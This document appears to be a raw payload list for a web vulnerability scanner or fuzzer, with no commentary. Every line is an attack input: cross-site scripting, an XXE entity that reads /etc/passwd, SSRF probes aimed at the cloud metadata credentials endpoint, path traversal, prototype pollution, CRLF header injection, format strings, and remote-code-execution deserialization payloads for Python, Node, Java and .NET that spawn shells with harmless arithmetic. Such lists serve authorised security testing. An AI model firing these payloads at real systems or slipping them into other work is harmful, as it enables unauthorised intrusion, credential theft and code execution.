'"><img src=x onerror=alert(1337)><!--
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://{domain}/ssrf
https://{domain}/ssrf
../../../../../../../etc/passwd
{"__proto__":{"polluted":1337}}
%0d%0aX-Injected:1337%0d%0a
%s%s%s%s%s%s%s%s%s%s
Y19fYnVpbHRpbl9fCmV2YWwKKFMnNyoxOTEnCnRSLg==
!!python/object/apply:builtins.eval ["7*191"]
{"py/reduce":[{"py/function":"builtins.eval"},{"py/tuple":["7*191"]}]}
{"rce":"_$$ND_FUNC$$_function(){return 7*191}()"}
<java version="1.8.0" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/sh</string></void><void index="1"><string>-c</string></void><void index="2"><string>expr 7 \* 191</string></void></array><void method="start"/></object></java>
{"$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework","MethodName":"Start","ObjectInstance":{"$type":"System.Diagnostics.Process, System","StartInfo":{"$type":"System.Diagnostics.ProcessStartInfo, System","FileName":"cmd","Arguments":"/c set /a 7*191"}}}
